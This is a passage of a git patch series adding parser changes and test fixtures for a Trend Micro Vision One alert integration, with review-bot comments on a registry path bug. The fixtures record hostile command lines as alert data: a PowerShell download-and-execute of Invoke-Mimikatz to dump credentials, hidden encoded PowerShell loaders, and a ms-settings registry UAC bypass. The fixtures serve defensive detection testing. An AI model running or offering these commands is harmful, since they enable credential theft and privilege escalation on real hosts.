[\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", 
\"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows 
update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + 
"command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json new file mode 100644 index 000000000..093876a30 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json 
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": 
\"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": 
\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": 
\"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], 
\"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": 
\"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows 
Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "email": "support@pctutordetroit.com" + } + } +} \ No newline at end of file From f316fac6627ec461e64f6d3fa367286cf088a1ad Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:52:34 +0200 Subject: [PATCH 056/150] Add smart descriptions --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 6 ++++++ Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 ++ Trend Micro/trend-micro-vision-one/tests/test_process.json | 1 + Trend Micro/trend-micro-vision-one/tests/test_registry.json | 1 + 4 files changed, 10 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index e69de29bb..7a3ee9d51 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json @@ -0,0 +1,6 @@ +[ + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 38a31dd29..be400399d 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
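Review bot: The expected `registry.path` in this new fixture is `hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute`, which repeats the key once per `registry_key` indicator (ids 5 and 6 carry the identical `objectRegistryKeyHandle`) and so pins a concatenation bug as the correct output. The `registry.hive` and `registry.key` fields in the same block are derived once, so the path should be `hkcr\\ms-settings\\shell\\open\\command\\delegateexecute`; the fix belongs in the parser's path assembly (not in this patch's view), which should take a single registry_key value before joining, and this expected value should change with it. Until then the test asserts a path that no Windows registry lookup would resolve, which matters for any detection or enrichment keyed on `registry.path`.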
@@ -20,6 +20,8 @@ stages: observer.vendor: "TrendMicro" observer.product: "Vision One" + event.reason: "{{parsed_event.message.model}}" + - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 5eca6b2ea..d6ef4acd1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Credential Dumping via Mimikatz", "type": [ "info" ] diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 093876a30..f9873edf1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", "type": [ "info" ] From 4b2aab06f6f6c739acc1bc9f1557ccc496ed6edc Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:54:57 +0200 Subject: [PATCH 057/150] Add automation UUIDs --- Trend Micro/trend-micro-vision-one/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index c0121a28d..8363b7b96 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -1,4 +1,6 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 name: Trend Micro Vision One slug: trend-micro-vision-one From fbbe4c415d5ff8c2fd61103b32f54b68711e66a7 Mon Sep 17 00:00:00 2001 
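Review bot: The added `event.reason: "{{parsed_event.message.model}}"` sits in the unconditional `set` stage next to the static `observer.*` values, so an alert without `model` is rendered rather than skipped. The Netskope parser in this same series guards optional source fields with a `filter`, and the `smart-descriptions.json` entry added alongside this hunk selects on `event.reason` being present, so if the engine keeps empty renders as empty strings the description would be chosen with an empty reason; I cannot confirm the engine's behaviour from here. Moving the field to its own guarded stage avoids the question: `- set:` / `    event.reason: "{{parsed_event.message.model}}"` / `  filter: "{{parsed_event.message.model not in [None, '']}}"`. The enclosing `stages:` list starts and ends outside the hunk.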
